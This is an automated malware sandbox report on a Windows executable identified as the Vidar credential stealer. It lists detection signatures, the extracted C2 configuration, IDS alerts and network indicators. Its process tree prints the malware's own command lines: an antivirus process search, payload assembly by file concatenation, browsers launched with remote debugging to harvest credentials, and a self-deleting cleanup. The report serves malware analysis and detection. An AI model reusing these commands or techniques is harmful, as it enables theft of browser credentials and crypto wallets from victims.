Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PodcastsTries.exe

Overview

General Information

Sample name:PodcastsTries.exe
Analysis ID:1580498
MD5:20bef33e4a0add922ae043e2aed13ea2
SHA1:4d0353be8234f56862b7ea7ece4ded3eeef91cbb
SHA256:847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2
Tags:exeuser-Brad_malware
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PodcastsTries.exe (PID: 3744 cmdline: "C:\Users\user\Desktop\PodcastsTries.exe" MD5: 20BEF33E4A0ADD922AE043E2AED13EA2)
    • cmd.exe (PID: 4236 cmdline: "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6244 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5344 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5176 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5756 cmdline: cmd /c md 680662 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6500 cmdline: extrac32 /Y /E Memo MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2024 cmdline: findstr /V "OBTAINING" Compensation MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6524 cmdline: cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Billion.com (PID: 1396 cmdline: Billion.com T MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 3268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 4392 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
          • msedge.exe (PID: 1268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • cmd.exe (PID: 7804 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7856 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 6036 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2268 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • msedge.exe (PID: 6524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5864 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 5004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 5664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              12.2.Billion.com.4390000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                12.2.Billion.com.4390000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Billion.com T, ParentImage: C:\Users\user\AppData\Local\Temp\680662\Billion.com, ParentProcessId: 1396, ParentProcessName: Billion.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2672, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4236, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5176, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T19:27:49.377028+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.649818TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T19:27:51.679968+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.649824TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T19:27:47.008486+010020490871A Network Trojan was detected192.168.2.649812188.245.216.205443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T19:27:44.693699+010028593781Malware Command and Control Activity Detected192.168.2.649806188.245.216.205443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.0% probability
                Source: PodcastsTries.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49936 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50110 version: TLS 1.2
                Source: PodcastsTries.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019DC54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA087
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA1E2
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0019E472
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_001AA570
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016C622 FindFirstFileExW,12_2_0016C622
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A66DC FindFirstFileW,FindNextFileW,FindClose,12_2_001A66DC
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A7333 FindFirstFileW,FindClose,12_2_001A7333
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001A73D4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49812 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49824
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49806 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49818
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 20.189.173.2 20.189.173.2
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                Source: unknownTCP traffic detected without corresponding DNS query: 44.206.23.126
                Source: unknownTCP traffic detected without corresponding DNS query: 44.206.23.126
                Source: unknownTCP traffic detected without corresponding DNS query: 52.222.144.19
                Source: unknownTCP traffic detected without corresponding DNS query: 54.230.112.123
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 54.230.112.123
                Source: unknownTCP traffic detected without corresponding DNS query: 52.222.144.19
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AD889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_001AD889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
